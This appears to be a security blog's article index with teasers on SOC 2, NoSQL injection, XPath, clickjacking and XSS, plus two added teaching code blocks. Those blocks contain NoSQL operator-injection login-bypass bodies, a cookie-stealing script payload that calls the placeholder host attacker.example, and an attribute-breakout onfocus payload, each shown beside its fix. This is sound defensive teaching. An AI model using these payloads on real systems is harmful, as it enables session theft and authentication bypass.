How to Pass a SOC 2 Audit

I often hear from people that audits are “brutal” and that passing a SOC 2 audit is a significant accomplishment. Most people I talk to feel that an audit is a burden and that passing it takes a lot of extra, unnecessary effort. At TCM Security, we...
Get Started with NoSQL Injection (NoSQLi)

NoSQL databases, a term that stands for “Not Only SQL,” represent a shift from traditional relational databases. Unlike their SQL-based counterparts that rely heavily on tables and fixed schemas, NoSQL databases provide flexible storage...
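The classic NoSQL injection the article's title refers to is MongoDB operator injection: a JSON body parser turns `{"password": {"$ne": null}}` into an object, and a handler that drops that object straight into a query turns "password equals X" into "password is not null". The block below is an added example, not code from the TCM Security article; it needs no database because it evaluates the query object against a constructed in-memory user list with a tiny matcher that understands only the `$ne`, `$gt` and `$regex` operators the attack relies on. The user records and request bodies are constructed sample data.

```javascript
// Added example (not from the original article): MongoDB-style operator
// injection through a login handler, and the type check that stops it.

// Constructed sample data standing in for a users collection.
const USERS = [
  { username: 'alice', password: 'correct horse battery staple' },
  { username: 'bob',   password: 'hunter2' },
];

// Minimal stand-in for MongoDB query matching: plain values compare for
// equality, objects are treated as operator expressions ($ne/$gt/$regex only).
function fieldMatches(value, cond) {
  if (cond !== null && typeof cond === 'object' && !Array.isArray(cond)) {
    const ops = Object.entries(cond);
    if (ops.length === 0) return false; // {} would only match an empty object
    return ops.every(([op, arg]) => {
      switch (op) {
        case '$ne':    return value !== arg;
        case '$gt':    return value > arg;
        case '$regex': return new RegExp(arg).test(String(value));
        default: throw new Error(`unsupported operator ${op}`);
      }
    });
  }
  return value === cond;
}

function findOne(collection, query) {
  return collection.find(doc =>
    Object.entries(query).every(([k, cond]) => fieldMatches(doc[k], cond))) || null;
}

// Vulnerable handler: whatever the JSON body contained goes into the query.
function loginVulnerable(body) {
  const user = findOne(USERS, { username: body.username, password: body.password });
  return user ? user.username : null;
}

// Hardened handler: credentials must be plain strings, so an operator
// object supplied by the client is rejected before it reaches the query.
function loginHardened(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return null;
  }
  const user = findOne(USERS, { username, password });
  return user ? user.username : null;
}

// Constructed request bodies, as a JSON body parser (e.g. express.json())
// would produce them. The last two never contain a real password.
const LEGIT            = { username: 'alice', password: 'correct horse battery staple' };
const WRONG_PASSWORD   = { username: 'alice', password: 'wrong' };
const INJECTED_NE      = { username: 'alice', password: { $ne: null } };
const INJECTED_GT      = { username: 'alice', password: { $gt: '' } };
const INJECTED_ANYUSER = { username: { $ne: null }, password: { $ne: null } };
```

The same bypass works against any query built from untyped request fields (`find`, `updateOne`, `deleteMany`), and also against `$where` and aggregation stages when strings are concatenated into them; the check in `loginHardened` is the general fix: validate the type and shape of each field before it is allowed to become part of a query.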
XPath Injection: A Beginner's Guide

XPath Injection, like other injection attacks, exploits applications that build queries from unvalidated user input. What sets it apart is the query language being abused: XPath, used to select nodes from XML documents. The fallout? Unauthorized...
Start your Journey with Bug Bounty

Bug bounty programs have been a popular phenomenon in the tech industry for the last decade or so. They're an opportunity for anyone to identify vulnerabilities in a company's software or infrastructure and get rewarded for their discoveries. But how do...
Clickjacking 101: What is Clickjacking and How Does it Work?

Clickjacking, also known as UI Redressing, is a technique that tricks users into clicking on unintended elements on a website. By layering hidden or transparent elements (typically an invisible iframe of the target site) over a decoy page, attackers deceive users into performing actions that they did not intend to carry out. Learn more about...
What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a type of security vulnerability in web applications that enables an attacker to insert malicious code, typically a script, into a web page that is then viewed by other users. When a web application fails to properly...
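The failure the teaser is about to describe is output encoding: the page reflects untrusted input into HTML without escaping the characters that mean something to the parser. The block below is an added example, not code from the TCM Security article. It renders a "search results" fragment two ways, once by concatenating the query into the markup and once through an HTML-escaping function, and includes two constructed attacker payloads: one that injects a `<script>` element into element text, and one that never uses a tag at all but breaks out of a quoted attribute to add an `onfocus` handler. The `attacker.example` host in the first payload is a placeholder, and the two checker functions are simplified inspectors written for this example, not a general HTML parser.

```javascript
// Added example (not from the original article): reflected XSS in a
// template, in both the text and the attribute context, and the escaping
// that neutralises it.

// Escape the five characters that matter in element text and in
// double- or single-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable: the untrusted query lands in element text and in an attribute.
function renderVulnerable(q) {
  return `<p>Results for: ${q}</p>\n<input name="q" value="${q}">`;
}

// Hardened: every interpolation of untrusted data goes through escapeHtml.
function renderSafe(q) {
  const e = escapeHtml(q);
  return `<p>Results for: ${e}</p>\n<input name="q" value="${e}">`;
}

// Simplified checker for this example: did a script element appear?
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Simplified checker for this example: which attributes does the <input>
// element end up with? Assumes the double-quoted attribute syntax the
// templates above produce; an injected handler shows up as an extra name.
function inputAttributeNames(html) {
  const m = html.match(/<input\b([^>]*)>/);
  if (!m) return [];
  const names = [];
  const re = /(?:^|\s)([^\s=]+)\s*=\s*"[^"]*"/g;
  let a;
  while ((a = re.exec(m[1])) !== null) names.push(a[1].toLowerCase());
  return names;
}

// Constructed attacker inputs. attacker.example is a placeholder host.
const PAYLOAD_TEXT = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>';
const PAYLOAD_ATTR = '" autofocus onfocus="alert(document.domain)';
```

The attribute payload is the reason "strip `<script>` tags" is not a fix: it contains no tag and no angle brackets, yet in the vulnerable render it closes the `value` attribute and adds an event handler that fires as soon as the field is focused. Escaping is context-specific; the function above is correct for HTML text and quoted attributes, but data placed inside a `<script>` block, a URL, or a CSS value needs the encoding for that context instead.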